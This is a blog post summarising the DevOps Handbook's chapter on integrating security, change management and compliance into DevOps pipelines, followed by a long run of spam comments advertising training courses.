DevOps Handbook Summary 4 of 4 - Security

Book summary of The DevOps Handbook by Gene Kim et. al. Excerpted content is formatted in italics.

Part VI: The Technical Practices of Integrating Information Security, Change Management, and Compliance

The DevOps goal is to make security a part of everyone's job. We'll look for opportunities to augment our controls with audit-able automation. This automation will minimize the need for separation of duties and change approvals that unnecessarily impede the value chain.  Once automated and baked into everyone's daily work the controls are less variable, more audit-able, and significantly stronger than the manual controls they replace. Some critical controls will remain manual.

We do this by:
  • Making security a part of everyone’s job 
  • Integrating preventative controls into our shared source code repository 
  • Integrating security with our deployment pipeline 
  • Integrating security with our telemetry to better enable detection and recovery 
  • Protecting our deployment pipeline 
  • Integrating our deployment activities with our change approval processes 
  • Reducing reliance on separation of duty

Information security as everyone's job every day

Integrate security:
  • Into development iteration demos - this means they are their own stories or are acceptance criteria of all relevant stories
  • Into defect tracking and post mortem's  - security defects should be tracked with all other defects and security incidents and security implications of any incident are subject to post mortem reviews
We must concern ourselves not only with application and data center security but with end to end value chain security.

Like all of our code be it application, infrastructure, operations etc.  security capabilities reside in our shared code repository standards making them easy to find, understand and use.  We may include items such as:
  • Code libraries and their recommended configurations (e.g., 2FA [two-factor authentication library], bcrypt password hashing, logging) 
  • Secret management (e.g., connection settings, encryption keys) using tools such as Vault, sneaker, Keywhiz, credstash, Trousseau, Red October, etc. 
  • OS packages and builds (e.g., NTP for time syncing, secure versions of OpenSSL with correct configurations, OSSEC or Tripwire for file integrity monitoring, syslog configuration to ensure logging of critical security into our centralized ELK stack)

Next we'll integrate security into our development pipelines by including as many automated security tests as we can to run with all our other automated tests. 

Tools such as Gauntlt have been designed to integrate into the deployment pipelines, which run automated security tests on our applications, our application dependencies, our environment, etc. Remarkably, Gauntlt even puts all its security tests in Gherkin syntax test scripts, which is widely used by developers for unit and functional testing. Doing this puts security testing in a framework they are likely already familiar with. This also allows security tests to easily run in a deployment pipeline on every committed change, such as static code analysis, checking for vulnerable dependencies, or dynamic testing.


Ensure security of the application

Developers, often focussed on happy path tests of correctness, will need security training to ensure use of sad or bad path automated tests and tools such as:
  1. Static analysis tools - Brakeman and Code Climate
  2. Dynamic analysis - Focusses on run time behavior. Tools include: ArachniOWASP ZapNmap and metasploit
  3. Dependency scanning - for malicious or vulnerable binaries
  4. Source code integrity and signing  - all developers are identified and use a security key e.g. PGP, all packages generated by continuous integration should be signed and inventoried for audit-ability.

Ensure the security of our environments

In this step, we should do whatever is required to help ensure that the environments are in a hardened, risk-reduced state. Although we may have created known, good configurations already, we must put in monitoring controls to ensure that all production instances match these known good states. 

We do this by generating automated tests to ensure that all appropriate settings have been correctly applied for configuration hardening, database security settings, key lengths, and so forth. Furthermore, we will use tests to scan our environments for known vulnerabilities.

Another category of security verification is understanding actual environments (i.e., “as they actually are”). Examples of tools for this include Nmap to ensure that only expected ports are open and Metasploit to ensure that we’ve adequately hardened our environments against known vulnerabilities, such as scanning with SQL injection attacks. The output of these tools should be put into our artifact repository and compared with the previous version as part of our functional testing process. Doing this will help us detect any undesirable changes as soon as they occur.

Incorporate security into telemetry

Environmental examples:
  • OS changes (e.g., in production, in our build infrastructure) 
  • Security group changes 
  • Changes to configurations (e.g., OSSEC, Puppet, Chef, Tripwire) 
  • Cloud infrastructure changes (e.g., VPC, security groups, users and privileges) 
  • XSS attempts (i.e., “cross-site scripting attacks”) 
  • SQLi attempts (i.e., “SQL injection attacks”) 
  • Web server errors (e.g., 4XX and 5XX errors)
Application examples:
  • Successful and unsuccessful user logins 
  • User password resets 
  • User email address resets
  • User credit card changes

Protect our development pipeline

Example countermeasures:
  • Hardening continuous build and integration servers and ensuring we can reproduce them in an automated manner
  • Reviewing all changes introduced into version control
  • Instrumenting our repository to detect when test code contains suspicious API calls 
  • Ensuring every CI process runs on its own isolated container or VM 
  • Ensuring the version control credentials used by the CI system are read-only

Protect our deployment pipeline

Integrate security and compliance into the change approval processes

Change management processes typically these address three types of changes:
  • Standard - low risk, maybe pre-approved
  • Normal - higher risk, typically requiring multiple party review
  • Urgent - high risk, often requiring executive approvals
Our goal is demonstrate that as a result of all of the automated and manual controls we have in place that a large majority of changes are standard changes and similarly that many urgent changes may be treated as normal changes.

Reduce reliance on separation of duty controls

When we did production deployments less frequently (e.g., annually) and when our work was less complex, compartmentalizing our work and doing hand-offs were tenable ways of conducting business. However, as complexity and deployment frequency increase, performing production deployments successfully increasingly requires everyone in the value stream to quickly see the outcomes of their actions. 

Separation of duty often can impede this by slowing down and reducing the feedback engineers receive on their work. This prevents engineers from taking full responsibility for the quality of their work and reduces a firm’s ability to create organizational learning. 

Consequently, wherever possible, we should avoid using separation of duties as a control. Instead, we should choose controls such as pair programming, continuous inspection of code check-ins, and code review. These controls can give us the necessary reassurance about the quality of our work. Furthermore, by putting these controls in place, if separation of duties is required, we can show that we achieve equivalent outcomes with the controls we have created.

To accomplish this we need to ensure we have documentation and proof for auditors and compliance officers.

As technology organizations increasingly adopt DevOps patterns, there is more tension than ever between IT and audit. These new DevOps patterns challenge traditional thinking about auditing, controls, and risk mitigation. 

As Bill Shinn, a principal security solutions architect at Amazon Web Services, observes, “DevOps is all about bridging the gap between Dev and Ops. In some ways, the challenge of bridging the gap between DevOps and auditors and compliance officers is even larger. For instance, how many auditors can read code and how many developers have read NIST 800-37 or the Gramm-Leach-Bliley Act? That creates a gap of knowledge, and the DevOps community needs to help bridge that gap.”

114 comments:

  1. Everyone wants to get unique place in the IT industry’s for that you need to upgrade your skills, your blog helps me improvise my skill set to get good career, keep sharing your thoughts with us.

    Devops Online Training

    ReplyDelete
  2. That was a nice to read, looking forward to see the next post..Thanks for the information
    More on Devops training

    ReplyDelete
  3. I believe there are many more pleasurable opportunities ahead for individuals that looked at your site"Devops Training in Chennai".

    ReplyDelete
  4. Awesome tips, thank you very much! I will be sharing and recommending this post to my blogging friends. DevOps Course | AWS/Python Training in Bangalore

    ReplyDelete
  5. really cool post, highly informative and professionally written and I am glad to be a visitor of this perfect blog, thank you for this rare info!
    devops training in hyderabad

    ReplyDelete
  6. Excellent Article ...thank u for sharing, such a valuable content Learners to get good knowledge after read this article.. Oracle Training in Chennai | Oracle Training Institute in Chennai


    Oracle Training in Chennai | Oracle Training Institute in Chennai

    ReplyDelete
  7. I feel really happy to have seen your webpage and look forward to so many more entertaining times reading here. Thanks once more for all the details.
    Devops Training in Chennai
    Devops Training Institute in Chennai

    ReplyDelete
  8. Nice information you have shared, It's useful beginners. Please keep updates on Devops Online Training Bangalore

    ReplyDelete
  9. Those guidelines additionally worked to become a good way to recognize that other people online have the identical fervor like mine to grasp great deal more around this condition.
    Devops Training in Bangalore

    ReplyDelete
  10. Devops is the process of development and process, Good blog for devops queries thanks for sharing check at Devops Online Training Hyderabad

    ReplyDelete
  11. Simple and very informative blog post on DevOps. Thanks for sharing, Keep share more content on DevOps Course

    DevOps Training in Chennai | DevOps Training Institute in Chennai

    ReplyDelete
  12. The information was super and elegant.I am waiting for your another article to read and I got knowledge about DevOps.Thank you
    DevOps Training in Chennai|DevOps Training Institute in Chennai

    ReplyDelete
  13. Very informative and It was an awesome post. I love reading your fantastic content. Thanks for sharing it with us. We are so greatful to your sharing.Security Monitor Pro 5.46

    ReplyDelete
  14. This comment has been removed by the author.

    ReplyDelete
  15. It has been simply incredibly generous with you to provide openly what exactly many individuals would’ve marketed for an eBook to end up making some cash for their end, primarily given that you could have tried it in the event you wante

    devops training in chennai

    ReplyDelete
  16. Thank you for posting such amazing article.Its easy to understand.I have learned lot of thing from your post.

    aws training in chennai

    selenium training in chennai

    python training in chennai

    ReplyDelete
  17. The article is super.I liked the way of presentation.It gave useful information.
    DevOps Training In Chennai | DevOps Training Institute In Chennai

    ReplyDelete
  18. Best article for DevOps.Its easy to learn.please Upload other article.Thankyou
    DevOps Training Institute In Chennai

    ReplyDelete
  19. From this article I understood the basic of DevOps.Thank you for posting an article.
    Best DevOps Training In Chennai

    ReplyDelete
  20. Your website gives lots of information to me. Thanks a lot for sharing this.

    DevOps Training in Chennai | DevOps Course in Chennai

    ReplyDelete
  21. Thankyou for posting this article.I got clear idea.Its easy to understand and the presentation is good
    DevOps Training in Chennai | DevOps Training Institute in Chennai

    ReplyDelete
  22. Thank you for your information.it is very nice article.
    Devops Training in Pune

    ReplyDelete
  23. very nice one and so informative thank you for the post.. Best devops training in chennai

    ReplyDelete
  24. My spouse and I love your blog and find almost all of your post’s to be just what I’m looking for. Can you offer guest writers to write content for you? I wouldn’t mind producing a post or elaborating on some the subjects you write concerning here. Again, awesome weblog!
    Online training in USA

    ReplyDelete
  25. I’ve bookmarked your site, and I’m adding your RSS feeds to my Google account.
    Click here:
    Online training in USA

    ReplyDelete
  26. Thanks for one marvelous posting! I enjoyed reading it; you are a great author. I will make sure to bookmark your blog and may come back someday. I want to encourage that you continue your great posts, have a nice weekend!

    ReplyDelete
  27. Really great post, I simply unearthed your site and needed to say that I have truly appreciated perusing your blog entries.
    java training in chennai | java training in bangalore

    java online training | java training in pune

    ReplyDelete
  28. Thanks for giving a great information about DevOps Good Explination nice Article
    anyone want to learn advance devops tools or devops online training
    DevOps Online Training
    DevOps Online Training hyderabad
    DevOps Training

    ReplyDelete
  29. Nice tutorial. Thanks for sharing the valuable information. it’s really helpful. Who want to learn this blog most helpful. Keep sharing on updated tutorials…
    Data Science Training in Chennai
    Data science training in bangalore
    Data science online training
    Data science training in pune
    Data science training in kalyan nagar
    selenium training in chennai

    ReplyDelete
  30. Thank you for sharing valuable information.This article is very useful for me valuable info about
    Devops Online Training.keep updating.........

    ReplyDelete
  31. Squirelogic Technologies deliver the Best DevOps Course in Chennai to acquire both practical and theoretical knowledge skill set in every module. Contact now!

    ReplyDelete
  32. thank you for sharing this blog very easy to understand
    Devops online Training

    ReplyDelete
  33. Were a gaggle of volunteers as well as starting off a brand new gumption within a community. Your blog furnished us precious details to be effective on. You've got completed any amazing work!
    python training in pune
    python training institute in chennai
    python training in Bangalore

    ReplyDelete
  34. This is amazing!!Excellent Blog very good content, this article is useful to beginners and real time Employees. Thanks for sharing!
    DevOps Online Training

    ReplyDelete
  35. nice post! Thanks for delivering a good stuff related to DevOps, Explination is good, nice Article
    anyone want to learn advance devops tools or devops online training
    DevOps Training
    DevOps Training institute in Ameerpet

    ReplyDelete

  36. well! Thanks for providing a good stuff related to DevOps Explination is good, nice Article
    DevOps Online Training

    ReplyDelete
  37. Nice tutorial. Thanks for sharing the valuable information. it’s really helpful. Who want to learn this blog most helpful. Keep sharing on updated tutorials…
    Java training in Chennai | Java training in Tambaram | Java training in Chennai | Java training in Velachery

    Java training in Chennai | Java training in Omr | Oracle training in Chennai

    ReplyDelete
  38. I love the blog. Great post. It is very true, people must learn how to learn before they can learn. lol i know it sounds funny but its very true. . .
    Python training in bangalore | Python course in pune | Python training in bangalore

    ReplyDelete
  39. Thank you for an additional great post. Exactly where else could anybody get that kind of facts in this kind of a ideal way of writing? I have a presentation next week, and I’m around the appear for this kind of data.
    python Online training in chennai
    python Online training in bangalore
    python interview question and answers

    ReplyDelete
  40. GOOD post! Thanks for SHARING a good stuff related to DevOps, Explination is good, nice Article
    anyone want to learn advance devops tools or devops online training
    DevOps Online Training
    DevOps Online Training hyderabad
    DevOps Training
    DevOps Training institute in Ameerpet

    ReplyDelete
  41. After seeing your article I want to say that the presentation is very good and also a well-written article with some very good information which is very useful for the readers....thanks for sharing it and do share more posts like this.

    aws Training in indira nagar

    selenium Training in indira nagar

    python Training in indira nagar

    datascience Training in indira nagar

    devops Training in indira nagar

    ReplyDelete
  42. Woah this blog is wonderful i like studying your posts. Keep up the great work! You understand, lots of persons are hunting around for this info, you could help them greatly.

    Microsoft Azure online training
    Selenium online training
    Java online training
    Python online training
    uipath online training

    ReplyDelete
  43. I have gone through your post and I found it very helpfull. Looking forward to see more post from you.

    Vmware Cloud Migration services

    Database Migration services

    ReplyDelete
  44. Thanks for sharing such a great blog Keep posting..
    AWS Training iN Delhi
    AWS Course in Delhi

    ReplyDelete
  45. Usually I never comment on blogs but your article is so convincing that I never stop myself to say something about it. You’re doing a great job Man, Keep it up.

    AWS Training in Chennai / Best AWS Training in Chennai
    AWS Training Course in Chennai / Best AWS Training Institute in Chennai

    ReplyDelete
  46. Good post!Thank you so much for sharing this pretty post,it was so good to read and useful to improve my knowledge as updated one,keep blogging.
    Devops Training in Electronic City

    ReplyDelete
  47. Its very easy for understanding. Thank you for sharing.
    AWS Devops Online Training

    ReplyDelete
  48. You are really passionate in writing blogs about Devops Training Institute and It’s really nice of you, you really give us lots of good ideas about this topic.
    Devops Training Institute in Pune

    ReplyDelete
  49. Awesome blog. I enjoyed reading your articles. This is truly a great read for me. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work!.

    aws Training in Bangalore
    python Training in Bangalore
    hadoop Training in Bangalore
    angular js Training in Bangalore
    bigdata analytics Training in Bangalore

    ReplyDelete
  50. Really an awesome blog for the freshers. Thanks for posting the information.
    AWS Training in Delhi
    AWS Course in Delhi

    ReplyDelete
  51. Really very happy to say, your post is very interesting to read. I never stop myself to say something about it. You’re doing a great job. Keep it up…

    Upgrade your career Learn SAP MM Training in Bangalore from industry experts get Complete hands-on Training, Interview preparation, and Job Assistance at Softgen Infotech.

    ReplyDelete
  52. Hi, Amazing you know this article is helping for me and everyone and thanks for sharing information DevOps Training Institute in Delhi

    ReplyDelete
  53. Good Post and informative one. Thank you for sharing this good article, it was so good to read and very useful to update my skill as updated one. Devops Course in Pune

    ReplyDelete
  54. I am really happy with your blog because your article is very unique and powerful for new reader.Devops Course in Pune

    ReplyDelete
  55. Thanks for sharing such a useful information with us …. I like the way you describe the post with us. Many thanks
    Devops Training Institute in Pune

    ReplyDelete
  56. Thanks for the post. It was very interesting and meaningful. I really appreciate it! Keep updating stuff like this.
    https://technogeekscs.com/courses/devops-with-puppet-training-institutes-in-pune-deveops-training-in-pune-classses-coaching

    ReplyDelete

  57. Very satisfied with the end result and would recommend my friends to it Devops Online Training Institute in Pune

    ReplyDelete
  58. Thanks for Sharing a Very Informative Post & I read Your Article & I must say that is very helpful post for us.
    Online Data Science Training in Pune, Mumbai, Delhi NCR

    ReplyDelete
  59. Wow it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot. it is really explainable very well and i got more information from your blog. Online Demo Sessions

    ReplyDelete
  60. Study Apache spark online training at affordable course fees ever in the market only at Spark Databox.
    Mobile No: +91-7530088009
    Website: Sparkdatabox

    ReplyDelete
  61. This information is really awesome thanks for sharing most valuable information.
    Register for a free Demo Sessions

    RPA Ui Path Online Training
    Best Python Online Training
    Online AWS Training
    Online Data Science Training

    ReplyDelete
  62. Online Automation Training | Job Oriented Training in Industrial Automation - 9953489987
    Automation/PLC/SCADA Training Institutes in India, Automation/PLC/SCADA Training Courses list with 100% Job Placement. ISO Certified · Experienced Faculty · Global Certification. Call @9953489987, 9711287737.

    ReplyDelete
  63. Wow it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot. it is really explainable very well and i got more information from your blog.
    We are giving all Programming Courses such as You can

    Register for a free Demo Sessions

    RPA Ui Path Online Training
    Best Python Online Training
    Online AWS Training
    Online Data Science Training

    ReplyDelete
  64. I appreciate this piece of useful information. We are Provides Online Course for Export Import Business, With our online training Certification Program you will learn how to Start Export Import Business : Export Import Certificate Online Training

    ReplyDelete
  65. Thank you for sharing such a beautiful information with us. I hope you will share more info about Azure Devops.Please keep sharing.
    Azure DevOps Online Training

    ReplyDelete
  66. Hello, Such a nice article. Great Share. Also, if You Are Looking for similar article then visit our website, We are technology/news/smartphone company, If you want to read such useful news then Visit us: https://techmie.com/

    ReplyDelete
  67. I m here to learn more about aws Thanks for Sharing
    Here you can check aws online training Training.

    aws Online Training

    ReplyDelete
  68. Thank you very much. Humans don’t behave rationally The reverse engineering is very hard to do The brain’s hardware is very different to a computer program
    AI Training in Bangalore

    AI Course in Bangalore

    ReplyDelete
  69. Marvellous blog and articles.Directly I am found which I truly need. please visit our website for more information about Azure DevOps Services and Solutions

    ReplyDelete
  70. Thanks for sharing most valuable information.
    RR technosoft offering DevOps training in hyderabad.DEVOPS WITH AWS & LINUX

    DevOps (development & operations) is an endeavor software development express used to mean a type of agile connection amongst development & IT operations. The objective of DevOps is to change & enhance the relationship by upholding better correspondence and coordinated effort between these two business units.
    Get more information call us:7680001943

    ReplyDelete
  71. Great Info, Your blog is very informative and interesting, your all post are amazing, keep sharing more interesting topics. Thanks for the blog. It really helps me a lot.
    Devops Course

    ReplyDelete
  72. Our Data Science course in Hyderabad will also help in seeking the highest paid job as we assist individuals for career advancement and transformation. We carefully curate the course curriculum to ensure that the individual is taught the advanced concepts of data science. This helps them in solving any challenge that occurs. Along with that, we also make students work on real case studies and use-cases derived.

    data science course in hyderabad

    ReplyDelete
  73. Digital Lync offers one of the best Online Courses Hyderabad with a comprehensive course curriculum with Continuous Integration, Delivery, and Testing. Elevate your practical knowledge with quizzes, assignments, Competitions, and Hackathons to give a boost to your confidence with our hands-on Full Stack Training. An advantage of the online Cources development course in Hyderabad from Digital Lync is to get industry-ready with Career Guidance and Interview preparation.
    DevOps Training Institute
    Python Training Institute
    AWS Training Institute
    Online Full Stack Developer Course Hyderabad
    Python Course Hyderabad
    Online AWS Training Course Hyderabad
    devops training in hyderabad
    angular training in hyderabad

    ReplyDelete
  74. Thanks for sharing this great article..Its really nice and useful for us.
    devops online training

    ReplyDelete
  75. Azure Migrate is designed to help you plan and execute your Azure migration, so you can move your applications and data to Azure. Discover how easy it is to migration to Azure using Azure Migrate.

    ReplyDelete
  76. Python Training institute in Chennai for skyrocketing your career, Infycle Technologies. It is the best Software Training & Placement institute in and around Chennai, that also gives the best placement training for personality tests, interview preparation, and mock interviews for leveling up the candidate's grades to a professional level.

    ReplyDelete


  77. Aimore Tech is the Best Software training institute in chennai with 6+ years of experience. We are offering online and classroom training.

    software testing training in chennai
    ccna training in chennai
    javascript training in chennai

    ReplyDelete
  78. Great Post! Thanks for sharing. Keep sharing such information.

    Apply Now for Devops Training in Noida

    For more details about the course fee, duration, classes, certification, and placement call our expert at 70-70-90-50-90

    ReplyDelete
  79. This is an amazing blog. Thanks for sharing such contents DevOps Training. This is really very helpful.
    We provide the best DevOps Training with highly qualified industry expert trainers who ensure guaranteed placement assistance for students.

    Contact us for more details 7070905090

    ReplyDelete

Please no spam, advertisements, or unrelated personal discussions.